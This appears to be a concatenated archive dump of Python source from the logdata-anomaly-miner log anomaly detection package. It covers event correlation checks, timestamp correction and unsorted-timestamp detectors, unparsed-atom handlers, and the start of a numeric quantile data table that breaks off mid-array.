check_range = check_range - 1 num_violations = num_violations + 1 break # So time range is OK, see if match parameters are also equal. violation_found = False for check_pos in range(4, len(a_event)): if a_event[check_pos] != b_event[check_pos]: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations < self.max_violations: violation_message += f"FAIL: \"{violation_line}\" ({a_event[2].action_id}) {a_event[check_pos]} is not" \ f" equal {b_event[check_pos]}\n" violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 violation_found = True break if violation_found: continue # We want to keep a history of good matches to ease diagnosis of correlation failures. Keep information about current line # for reference. self.correlation_history.add_object((a_event[3].match_element.match_string, a_event[2].action_id, b_event[3].match_element.match_string, b_event[2].action_id)) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 b_pos = b_pos + 1 if deleted is False: a_pos = a_pos + 1 # After checking all aEvents before a_pos were cleared, otherwise they violate a correlation rule. for a_pos in range(0, check_range): a_event = self.history_a_events[a_pos] if a_event is None: continue delta = newest_timestamp - a_event[0] if delta > self.max_time_delta: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= self.max_violations: violation_message += f"FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was not found in time!\n" violation_logs.append(violation_line) del self.history_a_events[a_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break if num_violations > self.max_violations: violation_message += f"... ({num_violations - self.max_violations} more)\n" if num_violations != 0 and len(self.correlation_history.get_history()) > 0: violation_message += "Historic examples:\n" for record in self.correlation_history.get_history(): violation_message += f' "{record[0].decode()}" ({record[1]}) ==> "{record[2].decode()}" ({record[3]})\n' if num_violations == 0: return None return violation_message, violation_logs def prepare_history_entry(self, selector, log_atom): """Return a history entry for a parser match.""" parser_match = log_atom.parser_match timestamp = log_atom.get_timestamp() length = 4 if self.artefact_match_parameters is not None: length += len(self.artefact_match_parameters) result = [None] * length result[0] = timestamp result[1] = 0 result[2] = selector result[3] = parser_match if result[0] < self.last_timestamp_seen: msg = "Timestamps unsorted!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.last_timestamp_seen = result[0] if self.artefact_match_parameters is not None: pos = 4 v_dict = parser_match.get_match_dictionary() for artefact_match_parameter in self.artefact_match_parameters: for param_path in artefact_match_parameter: match_element = v_dict.get(param_path, None) if match_element is not None: result[pos] = match_element.match_object pos += 1 return result TimestampCorrectionFilters.py000066400000000000000000000044031500476301700366460ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This file collects various classes useful to filter and correct the timestamp associated with a received parsed atom. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface class SimpleMonotonicTimestampAdjust(AtomHandlerInterface): """Handlers of this class compare the timestamp of a newly received atom with the largest timestamp seen so far. When below, the timestamp of this atom is adjusted to the largest value seen, otherwise the largest value seen is updated. """ def __init__(self, subhandler_list, stop_when_handled_flag=False): # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) self.latest_timestamp_seen = 0 def receive_atom(self, log_atom): """Pass the atom to the subhandlers. @return false when no subhandler was able to handle the atom. """ self.log_total += 1 if log_atom.get_timestamp() is not None: if log_atom.get_timestamp() < self.latest_timestamp_seen: log_atom.set_timestamp(self.latest_timestamp_seen) else: self.latest_timestamp_seen = log_atom.get_timestamp() result = False for handler, _ in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True if self.stop_when_handled_flag: break if result: self.log_success += 1 return result TimestampsUnsortedDetector.py000066400000000000000000000074731500476301700367000ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for unsorted timestamps. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os from aminer.input.InputInterfaces import AtomHandlerInterface from datetime import datetime from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class TimestampsUnsortedDetector(AtomHandlerInterface): """This class creates events when unsorted timestamps are detected. This is useful mostly to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. """ def __init__(self, aminer_config, anomaly_event_handlers, exit_on_error_flag=False, output_logline=True): """Initialize the detector. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param exit_on_error_flag exit the aminer forcefully if a log atom with a wrong timestamp is found. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, exit_on_error_flag=exit_on_error_flag, output_logline=output_logline) self.last_timestamp = 0 def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, the caller may decide if it makes sense passing the parsed atom also to other handlers. """ self.log_total += 1 if log_atom.get_timestamp() is None: return False if log_atom.get_timestamp() < self.last_timestamp: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [original_log_line_prefix + data] analysis_component = {"LastTimestamp": self.last_timestamp} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", f"Timestamp {datetime.fromtimestamp(log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} below " f"{datetime.fromtimestamp(self.last_timestamp).strftime('%Y-%m-%d %H:%M:%S')}", sorted_log_lines, event_data, log_atom, self) if self.exit_on_error_flag: import sys sys.exit(1) self.last_timestamp = log_atom.get_timestamp() self.log_success += 1 return True UnparsedAtomHandlers.py000066400000000000000000000067261500476301700354170ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a handler that forwards unparsed atoms to the event handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer import AminerConfig from aminer.parsing.MatchContext import DebugMatchContext from aminer.AminerConfig import DEBUG_LOG_NAME import logging class SimpleUnparsedAtomHandler(AtomHandlerInterface): """Handlers of this class will just forward the received unparsed atoms to the registered event handlers.""" def __init__(self, anomaly_event_handlers): """Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers=anomaly_event_handlers) def receive_atom(self, log_atom): """Receive an unparsed atom to create events for each.""" if log_atom.is_parsed(): return False try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) self.send_event_to_handlers(data, log_atom) return True def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" event_data = {} for listener in self.anomaly_event_handlers: listener.receive_event("Input.UnparsedAtomHandler", "Unparsed atom received", [data], event_data, log_atom, self) class VerboseUnparsedAtomHandler(SimpleUnparsedAtomHandler): """Handlers of this class will forward received unparsed atoms to the registered event handlers applying the DebugMatchContext.""" def __init__(self, anomaly_event_handlers, parsing_model): """Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers) if not isinstance(parsing_model, ModelElementInterface): msg = "Only subclasses of ModelElementInterface are allowed for parsing_model." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parsing_model = parsing_model def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" match_context = DebugMatchContext(log_atom.raw_data) self.parsing_model.get_match_element("", match_context) debug_info = match_context.get_debug_info() debug_lines = [] for line in debug_info.split("\n"): debug_lines.append(line.strip()) event_data = {"DebugLog": debug_lines} for listener in self.anomaly_event_handlers: listener.receive_event( "Input.VerboseUnparsedAtomHandler", "Unparsed atom received", [debug_info + data], event_data, log_atom, self) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/VTDData.py000066400000000000000000031626201500476301700326410ustar00rootroot00000000000000import numpy as np quantiles = {'spec': np.array([-1.8273443302401238,-1.7593797798616286,-1.709951015949996,-1.6790580385052258,-1.6543436565494094,-1.6296292745935932,-1.6110934881267307,-1.5925577016598689,-1.5740219151930066,-1.561664724215098,-1.5493075332371908,-1.5369503422592823,-1.5245931512813744,-1.512235960303466,-1.5060573648145121,-1.4937001738366036,-1.4875215783476496,-1.4751643873697418,-1.4689857918807874,-1.4628071963918334,-1.4566286009028795,-1.444271409924971,-1.438092814436017,-1.431914218947063,-1.4257356234581091,-1.4195570279691547,-1.4133784324802008,-1.4071998369912468,-1.401021241502293,-1.3948426460133383,-1.3886640505243844,-1.3824854550354304,-1.3763068595464765,-1.373217561801999,-1.370128264057522,-1.363949668568568,-1.357771073079614,-1.35159247759066,-1.3485031798461826,-1.3454138821017056,-1.3392352866127517,-1.3330566911237978,-1.3299673933793208,-1.3268780956348438,-1.3206995001458892,-1.3176102024014122,-1.3145209046569353,-1.3083423091679813,-1.3052530114235044,-1.3021637136790274,-1.295985118190073,-1.292895820445596,-1.289806522701119,-1.2836279272121651,-1.2805386294676881,-1.2774493317232112,-1.2743600339787335,-1.2712707362342566,-1.2650921407453026,-1.2620028430008257,-1.2589135452563487,-1.2558242475118717,-1.2527349497673947,-1.2496456520229173,-1.2465563542784404,-1.2434670565339634,-1.2403777587894864,-1.2341991633005323,-1.2311098655560553,-1.2280205678115783,-1.2249312700671011,-1.2218419723226241,-1.2187526745781472,-1.2156633768336702,-1.2125740790891932,-1.209484781344716,-1.206395483600239,-1.203306185855762,-1.2002168881112847,-1.1971275903668077,-1.1940382926223307,-1.1909489948778538,-1.1878596971333768,-1.1847703993888996,-1.1827108675592481,-1.1806513357295971,-1.1785918038999457,-1.175502506155469,-1.172413208410992,-1.169323910666515,-1.1662346129220378,-1.1631453151775606,-1.1600560174330836,-1.1569667196886066,-1.1538774219441297,-1.1518178901144782,-1.1497583582848272,-1.1476988264551757,-1.1446095287106988,-1.1415202309662216,-1.1384309332217442,-1.1353416354772672,-1.133282103647616,-1.1312225718179647,-1.1291630399883132,-1.1260737422438363,-1.1229844444993593,-1.120924912669708,-1.1188653808400566,-1.1168058490104051,-1.113716551265928,-1.110627253521451,-1.107537955776974,-1.104448658032497,-1.1023891262028456,-1.1003295943731946,-1.098270062543543,-1.0951807647990661,-1.092091467054589,-1.0900319352249375,-1.087972403395286,-1.0859128715656345,-1.0828235738211576,-1.0797342760766806,-1.0776747442470294,-1.0756152124173781,-1.0735556805877267,-1.0704663828432497,-1.0673770850987725,-1.065317553269121,-1.0632580214394698,-1.0611984896098183,-1.0591389577801669,-1.0570794259505158,-1.0550198941208644,-1.0519305963763874,-1.0488412986319104,-1.046781766802259,-1.0447222349726075,-1.0426627031429563,-1.0395734053984789,-1.036484107654002,-1.0344245758243507,-1.0323650439946994,-1.030305512165048,-1.0282459803353967,-1.0261864485057455,-1.024126916676094,-1.021037618931617,-1.0179483211871398,-1.0158887893574884,-1.0138292575278371,-1.0117697256981857,-1.0097101938685342,-1.0076506620388832,-1.0055911302092317,-1.0025018324647548,-0.9994125347202778,-0.9973530028906263,-0.995293471060975,-0.9932339392313235,-0.9911744074016722,-0.9891148755720207,-0.9870553437423694,-0.9839660459978924,-0.9808767482534154,-0.978817216423764,-0.9767576845941128,-0.9746981527644615,-0.97263862093481,-0.9705790891051587,-0.9685195572755072,-0.96543025953103,-0.962340961786553,-0.9602814299569016,-0.9582218981272504,-0.9561623662975991,-0.9541028344679476,-0.9520433026382965,-0.9499837708086452,-0.9468944730641682,-0.9438051753196909,-0.9417456434900395,-0.9396861116603881,-0.9376265798307367,-0.9355670480010853,-0.9335075161714341,-0.9314479843417828,-0.9283586865973058,-0.9252693888528288,-0.9232098570231774,-0.921150325193526,-0.9190907933638746,-0.9170312615342232,-0.9149717297045717,-0.9129121978749204,-0.9098229001304434,-0.9067336023859665,-0.904674070556315,-0.9026145387266639,-0.9005550068970124,-0.898495475067361,-0.8964359432377096,-0.8943764114080582,-0.891287113663581,-0.888197815919104,-0.8861382840894528,-0.8840787522598015,-0.8820192204301504,-0.878929922685673,-0.8758406249411961,-0.8737810931115447,-0.8717215612818936,-0.8696620294522421,-0.8676024976225908,-0.8655429657929393,-0.863483433963288,-0.860394136218811,-0.857304838474334,-0.8552453066446826,-0.8531857748150312,-0.8511262429853798,-0.8490667111557284,-0.8470071793260773,-0.8449476474964258,-0.8418583497519488,-0.8387690520074716,-0.8367095201778202,-0.8346499883481691,-0.8325904565185177,-0.8305309246888662,-0.8284713928592149,-0.8264118610295634,-0.8233225632850865,-0.8202332655406095,-0.8181737337109581,-0.8161142018813067,-0.8140546700516553,-0.8119951382220039,-0.8099356063923527,-0.8078760745627014,-0.8047867768182241,-0.8016974790737471,-0.7996379472440958,-0.7975784154144446,-0.7955188835847932,-0.7934593517551418,-0.7913998199254904,-0.789340288095839,-0.786250990351362,-0.7831616926068851,-0.7811021607772336,-0.7790426289475822,-0.7769830971179308,-0.7749235652882794,-0.7728640334586283,-0.7708045016289768,-0.7677152038844999,-0.7646259061400227,-0.7625663743103712,-0.7605068424807201,-0.7584473106510687,-0.7553580129065914,-0.7522687151621145,-0.7502091833324631,-0.748149651502812,-0.7460901196731605,-0.7440305878435092,-0.7419710560138577,-0.7399115241842064,-0.7368222264397294,-0.7337329286952524,-0.731673396865601,-0.7296138650359496,-0.7275543332062981,-0.7254948013766468,-0.7234352695469957,-0.7213757377173442,-0.7182864399728672,-0.71519714222839,-0.7131376103987386,-0.7110780785690874,-0.7090185467394361,-0.7069590149097846,-0.7048994830801333,-0.7028399512504818,-0.6997506535060048,-0.6966613557615279,-0.6946018239318765,-0.6925422921022254,-0.6904827602725739,-0.687393462528097,-0.6843041647836198,-0.6822446329539683,-0.6801851011243172,-0.6781255692946658,-0.6760660374650144,-0.674006505635363,-0.6719469738057116,-0.6688576760612346,-0.6657683783167576,-0.6637088464871063,-0.6616493146574548,-0.6595897828278035,-0.6565004850833265,-0.6534111873388495,-0.651351655509198,-0.6492921236795467,-0.6472325918498952,-0.645173060020244,-0.6431135281905925,-0.6410539963609413,-0.6379646986164642,-0.6348754008719871,-0.6328158690423358,-0.6307563372126844,-0.6286968053830332,-0.625607507638556,-0.6225182098940789,-0.6204586780644277,-0.6183991462347762,-0.616339614405125,-0.6142800825754736,-0.6122205507458222,-0.6101610189161708,-0.6070717211716938,-0.6039824234272169,-0.6019228915975654,-0.599863359767914,-0.5978038279382626,-0.5947145301937856,-0.5916252324493086,-0.5895657006196572,-0.5875061687900058,-0.5854466369603544,-0.5833871051307031,-0.5813275733010518,-0.5792680414714004,-0.5761787437269233,-0.5730894459824463,-0.571029914152795,-0.5689703823231436,-0.5669108504934923,-0.5638215527490152,-0.560732255004538,-0.5586727231748868,-0.5566131913452355,-0.5545536595155841,-0.551464361771107,-0.5483750640266299,-0.5463155321969787,-0.5442560003673272,-0.542196468537676,-0.5401369367080245,-0.5380774048783732,-0.5360178730487217,-0.5329285753042448,-0.5298392775597678,-0.5277797457301164,-0.525720213900465,-0.5236606820708136,-0.5205713843263367,-0.5174820865818597,-0.5154225547522082,-0.5133630229225569,-0.5113034910929054,-0.5082141933484284,-0.5051248956039515,-0.5030653637743001,-0.5010058319446486,-0.4989463001149973,-0.49585700237052033,-0.49276770462604347,-0.49070817279639206,-0.4886486409667408,-0.4865891091370894,-0.48349981139261244,-0.4804105136481353,-0.4783509818184839,-0.47629144998883266,-0.47423191815918125,-0.47217238632952985,-0.47011285449987855,-0.46805332267022715,-0.46496402492575006,-0.4618747271812731,-0.4598151953516217,-0.4577556635219704,-0.455696131692319,-0.4526068339478419,-0.44951753620336493,-0.4474580043737135,-0.44539847254406223,-0.4433389407144108,-0.4402496429699337,-0.4371603452254567,-0.4351008133958053,-0.43304128156615407,-0.43098174973650266,-0.4278924519920255,-0.42480315424754855,-0.42274362241789715,-0.4206840905882459,-0.4186245587585945,-0.41553526101411736,-0.4124459632696404,-0.410386431439989,-0.40832689961033775,-0.40626736778068634,-0.4031780700362092,-0.40008877229173223,-0.3980292404620808,-0.3959697086324296,-0.3939101768027782,-0.39082087905830104,-0.38773158131382407,-0.38567204948417266,-0.3836125176545214,-0.38155298582487,-0.3784636880803929,-0.3753743903359159,-0.37228509259143894,-0.36919579484696186,-0.36713626301731045,-0.36507673118765915,-0.36301719935800775,-0.3599279016135308,-0.3568386038690537,-0.3547790720394023,-0.352719540209751,-0.3506600083800996,-0.3475707106356226,-0.34448141289114553,-0.3424218810614941,-0.34036234923184283,-0.3383028174021914,-0.33521351965771445,-0.33212422191323737,-0.33006469008358597,-0.32800515825393467,-0.32594562642428326,-0.3228563286798063,-0.3197670309353292,-0.3177074991056778,-0.3156479672760265,-0.3135884354463751,-0.31049913770189813,-0.30740983995742105,-0.3043205422129441,-0.3012312444684671,-0.2991717126388157,-0.2971121808091644,-0.295052648979513,-0.29196335123503603,-0.2888740534905589,-0.2868145216609075,-0.28475498983125624,-0.28269545800160484,-0.27960616025712787,-0.27651686251265073,-0.27342756476817365,-0.2703382670236967,-0.26827873519404527,-0.266219203364394,-0.26415967153474257,-0.2610703737902655,-0.2579810760457885,-0.2559215442161371,-0.2538620123864858,-0.2518024805568344,-0.24871318281235733,-0.24562388506788035,-0.24253458732340338,-0.23944528957892627,-0.23738575774927487,-0.2353262259196236,-0.2332666940899722,-0.23017739634549522,-0.2270880986010181,-0.223998800856541,-0.22090950311206403,-0.21884997128241263,-0.21679043945276136,-0.21473090762310995,-0.21164160987863284,-0.20855231213415587,-0.20649278030450446,-0.20443324847485317,-0.20237371664520176,-0.19928441890072465,-0.19619512115624768,-0.1931058234117707,-0.1900165256672936,-0.1879569938376422,-0.18589746200799093,-0.18383793017833952,-0.18074863243386255,-0.17765933468938544,-0.17457003694490833,-0.17148073920043136,-0.16942120737077995,-0.16736167554112868,-0.16530214371147728,-0.1622128459670003,-0.15912354822252334,-0.15603425047804623,-0.15294495273356926,-0.15088542090391785,-0.14882588907426658,-0.14676635724461518,-0.14367705950013807,-0.1405877617556611,-0.13749846401118412,-0.13440916626670701,-0.1313198685222299,-0.12823057077775293,-0.12617103894810153,-0.12411150711845026,-0.12205197528879885,-0.11896267754432174,-0.11587337979984477,-0.1127840820553678,-0.10969478431089069,-0.10763525248123929,-0.10557572065158802,-0.10351618882193661,-0.10042689107745964,-0.09733759333298253,-0.09424829558850542,-0.09115899784402844,-0.08806970009955147,-0.08498040235507436,-0.08292087052542295,-0.08086133869577168,-0.07880180686612027,-0.0757125091216433,-0.0726232113771662,-0.06953391363268908,-0.06644461588821211,-0.06335531814373514,-0.06026602039925803,-0.058206488569606626,-0.05614695673995536,-0.05408742491030395,-0.05099812716582691,-0.04790882942134987,-0.04481953167687283,-0.04173023393239579,-0.03864093618791875,-0.03555163844344171,-0.03246234069896467,-0.029373042954487626,-0.02731351112483629,-0.025253979295184883,-0.023194447465533546,-0.020105149721056502,-0.01701585197657946,-0.013926554232102421,-0.010837256487625381,-0.00774795874314834,-0.0046586609986712995,-0.0015693632541942586,0.0015199344902827824,0.00357946631993412,0.005638998149585526,0.007698529979236864,0.010787827723713905,0.013877125468190945,0.016966423212667985,0.020055720957145026,0.02314501870162207,0.02623431644609911,0.02932361419057615,0.03241291193505319,0.03550220967953016,0.03859150742400713,0.04168080516848417,0.04477010291296122,0.04682963474261256,0.04888916657226396,0.0509486984019153,0.05403799614639234,0.05712729389086938,0.06021659163534642,0.06330588937982347,0.06639518712430051,0.06948448486877755,0.07257378261325459,0.07566308035773163,0.07875237810220867,0.08184167584668571,0.08493097359116275,0.08802027133563979,0.09110956908011683,0.09419886682459387,0.09625839865424521,0.09831793048389662,0.10037746231354795,0.10346676005802499,0.10655605780250203,0.10964535554697907,0.11273465329145611,0.11582395103593315,0.1189132487804102,0.12200254652488723,0.1250918442693643,0.12818114201384126,0.13127043975831829,0.13435973750279534,0.13744903524727237,0.14053833299174942,0.14362763073622645,0.1467169284807035,0.14980622622518053,0.15289552396965758,0.1559848217141346,0.15907411945861166,0.1621634172030887,0.16525271494756574,0.16834201269204277,0.17143131043651982,0.17452060818099685,0.1776099059254739,0.18069920366995093,0.18378850141442798,0.18687779915890504,0.18996709690338207,0.19305639464785912,0.19614569239233615,0.1992349901368132,0.20232428788129023,0.2054135856257672,0.20850288337024425,0.21159218111472128,0.21468147885919833,0.21777077660367536,0.2208600743481524,0.22394937209262944,0.2270386698371065,0.23012796758158352,0.23321726532606057,0.2363065630705376,0.23939586081501465,0.24248515855949168,0.24557445630396874,0.24866375404844576,0.2517530517929228,0.25484234953739987,0.2579316472818769,0.2610209450263539,0.264110242770831,0.26719954051530803,0.27028883825978506,0.2733781360042621,0.27646743374873917,0.2795567314932162,0.2826460292376932,0.28573532698217025,0.29191392247112435,0.2950032202156014,0.2980925179600784,0.30118181570455543,0.30427111344903246,0.3073604111935095,0.3104497089379865,0.31353900668246354,0.3166283044269406,0.31971760217141765,0.3228068999158947,0.3258961976603717,0.3289854954048488,0.3320747931493258,0.33516409089380284,0.34134268638275694,0.34443198412723397,0.34752128187171094,0.3506105796161881,0.35369987736066505,0.35678917510514213,0.3598784728496191,0.36296777059409624,0.3660570683385732,0.3691463660830503,0.37223566382752726,0.37841425931648137,0.3815035570609584,0.3845928548054354,0.38768215254991245,0.39077145029438953,0.39386074803886656,0.3969500457833436,0.4000393435278206,0.4031286412722977,0.40930723676125175,0.4123965345057288,0.41548583225020586,0.4185751299946829,0.4216644277391599,0.424753725483637,0.427843023228114,0.43402161871706807,0.43711091646154504,0.4402002142060222,0.44328951195049915,0.44637880969497623,0.4494681074394532,0.45255740518393034,0.45873600067288434,0.46182529841736136,0.46491459616183844,0.46800389390631547,0.4710931916507925,0.4741824893952695,0.4772717871397466,0.48345038262870066,0.4865396803731777,0.48962897811765477,0.4927182758621318,0.4958075736066088,0.5019861690955629,0.50507546684004,0.508164764584517,0.5112540623289941,0.514343360073471,0.5205219555624251,0.5236112533069022,0.5267005510513791,0.5297898487958562,0.5328791465403333,0.5390577420292874,0.5421470397737643,0.5452363375182414,0.5483256352627185,0.5514149330071955,0.5575935284961496,0.5606828262406266,0.5637721239851037,0.5668614217295807,0.5699507194740577,0.5761293149630118,0.5792186127074889,0.582307910451966,0.58848650594092,0.5915758036853971,0.594665101429874,0.5977543991743511,0.6008436969188281,0.6070222924077823,0.6101115901522592,0.6132008878967362,0.6193794833856904,0.6224687811301673,0.6255580788746444,0.6317366743635986,0.6348259721080756,0.6379152698525525,0.6440938653415067,0.6471831630859837,0.6502724608304606,0.6533617585749378,0.6564510563194148,0.6626296518083689,0.6657189495528459,0.6688082472973229,0.674986842786277,0.6780761405307542,0.6811654382752311,0.6873440337641852,0.6904333315086623,0.6935226292531392,0.6997012247420933,0.7058798202310475,0.7089691179755245,0.7120584157200015,0.7182370112089556,0.7213263089534326,0.7244156066979096,0.7305942021868638,0.7336834999313409,0.7367727976758178,0.7429513931647719,0.746040690909249,0.7491299886537259,0.7553085841426801,0.7614871796316341,0.7645764773761111,0.7676657751205882,0.7738443706095423,0.7769336683540192,0.7800229660984964,0.7862015615874505,0.7923801570764044,0.7954694548208815,0.7985587525653586,0.8047373480543126,0.8078266457987897,0.8109159435432668,0.8170945390322207,0.823273134521175,0.826362432265652,0.829451730010129,0.835630325499083,0.8418089209880371,0.844898218732514,0.8479875164769911,0.8541661119659453,0.8603447074548993,0.8634340051993764,0.8665233029438534,0.8727018984328074,0.8788804939217616,0.8850590894107156,0.8881483871551927,0.8912376848996697,0.8974162803886238,0.9035948758775779,0.9066841736220549,0.909773471366532,0.915952066855486,0.9221306623444401,0.9283092578333942,0.9313985555778712,0.9344878533223482,0.9406664488113023,0.9468450443002563,0.9530236397892106,0.9561129375336875,0.9592022352781645,0.9653808307671187,0.9715594262560726,0.9777380217450269,0.9839166172339808,0.9870059149784579,0.990095212722935,0.9962738082118889,1.002452403700843,1.008630999189797,1.0148095946787512,1.0209881901677054,1.0271667856566593,1.0302560834011365,1.0333453811456135,1.0395239766345676,1.0457025721235216,1.0518811676124757,1.0580597631014297,1.0642383585903838,1.070416954079338,1.076595549568292,1.0796848473127691,1.0827741450572461,1.0889527405462003,1.0951313360351542,1.1013099315241082,1.1074885270130623,1.1136671225020165,1.1198457179909704,1.1260243134799246,1.1322029089688785,1.1383815044578327,1.1445600999467869,1.1507386954357408,1.156917290924695,1.1630958864136491,1.169274481902603,1.1754530773915572,1.1816316728805112,1.1878102683694653,1.1939888638584195,1.2001674593473735,1.2063460548363276,1.2125246503252818,1.2187032458142357,1.2248818413031899,1.2310604367921438,1.237239032281098,1.243417627770052,1.249596223259006,1.2557748187479605,1.2619534142369144,1.2681320097258684,1.2743106052148225,1.2804892007037767,1.2866677961927306,1.2990249871706385,1.3052035826595927,1.311382178148547,1.317560773637501,1.323739369126455,1.3299179646154091,1.3360965601043633,1.3484537510822712,1.3546323465712253,1.3608109420601797,1.3669895375491337,1.3731681330380876,1.3793467285270418,1.3917039195049499,1.3978825149939038,1.404061110482858,1.4102397059718124,1.4225968969497202,1.4287754924386744,1.4349540879276284,1.4411326834165825,1.4534898743944904,1.4596684698834448,1.465847065372399,1.4782042563503068,1.484382851839261,1.4905614473282152,1.502918638306123,1.5090972337950774,1.5152758292840316,1.5276330202619395,1.5338116157508936,1.5461688067288017,1.5523474022177557,1.5647045931956642,1.5708831886846182,1.5832403796625263,1.5894189751514805,1.6017761661293883,1.6079547616183427,1.6203119525962508,1.6264905480852048,1.6388477390631127,1.645026334552067,1.657383525529975,1.6697407165078835,1.6759193119968374,1.6882765029747453,1.6944550984636997,1.7068122894416076,1.7191694804195161,1.731526671397424,1.737705266886378,1.7500624578642865,1.7624196488421944,1.7747768398201027,1.7871340307980106,1.7994912217759191,1.805669817264873,1.8180270082427814,1.8303841992206893,1.8427413901985972,1.8550985811765057,1.8674557721544136,1.879812963132322,1.8983487495991844,1.9107059405770923,1.9230631315550006,1.9354203225329085,1.947777513510817,1.966313299977679,1.9786704909555872,1.991027681933495,2.0095634684003576,2.0219206593782655,2.0404564458451278,2.052813636823036,2.071349423289898,2.0898852097567606,2.102242400734669,2.1207781872015308,2.139313973668393,2.1578497601352553,2.176385546602118,2.19492133306898,2.213457119535842,2.2319929060027044,2.2567072879585206,2.2752430744253833,2.293778860892245,2.3184932428480614,2.3432076248038776,2.3679220067596938,2.3926363887155104,2.4173507706713266,2.442065152627143,2.4729581300719135,2.4976725120277297,2.5285654894725,2.55945846691727,2.590351444362041,2.627423017295765,2.66449459022949,2.701566163163214,2.744816331585892,2.788066500008571,2.8374952639202036,2.8869240278318364,2.942531387232423,3.004317342121964,3.072281892500459,3.1464250383679073,3.2391039707022187,3.344140094014438,3.473890599282474,3.646891272973188]), 'betam1': np.array([0.0,0.00025,0.0005,0.00075,0.001,0.0012000000000000001,0.0014,0.0015999999999999999,0.0018,0.002,0.0022,0.0024000000000000002,0.0026,0.0028,0.003,0.0032,0.0034000000000000002,0.0036,0.0038,0.004,0.0042,0.0044,0.0046,0.0048000000000000004,0.005,0.0052,0.0054,0.0056,0.0058000000000000005,0.006,0.0062,0.0064,0.0066,0.0068000000000000005,0.007,0.0072,0.0074,0.0076,0.0078000000000000005,0.008,0.0082,0.0084,0.0086,0.008799999999999999,0.009,0.00925,0.0095,0.00975,0.01,0.0102,0.0104,0.0106,0.010799999999999999,0.011,0.0112,0.0114,0.0116,0.0118,0.012,0.0122,0.0124,0.0126,0.012799999999999999,0.013,0.0132,0.0134,0.0136,0.0138,0.014,0.01425,0.014499999999999999,0.01475,0.015,0.0152,0.0154,0.0156,0.0158,0.016,0.0162,0.0164,0.0166,0.016800000000000002,0.017,0.01725,0.0175,0.01775,0.018,0.018199999999999997,0.0184,0.0186,0.0188,0.019,0.0192,0.0194,0.0196,0.0198,0.02,0.02025,0.0205,0.02075,0.021,0.0212,0.0214,0.0216,0.0218,0.022,0.02225,0.0225,0.02275,0.023,0.0232,0.0234,0.0236,0.0238,0.024,0.02425,0.0245,0.02475,0.025,0.0252,0.0254,0.0256,0.0258,0.026,0.02625,0.0265,0.02675,0.027,0.0272,0.0274,0.0276,0.027800000000000002,0.028,0.02825,0.0285,0.02875,0.029,0.0292,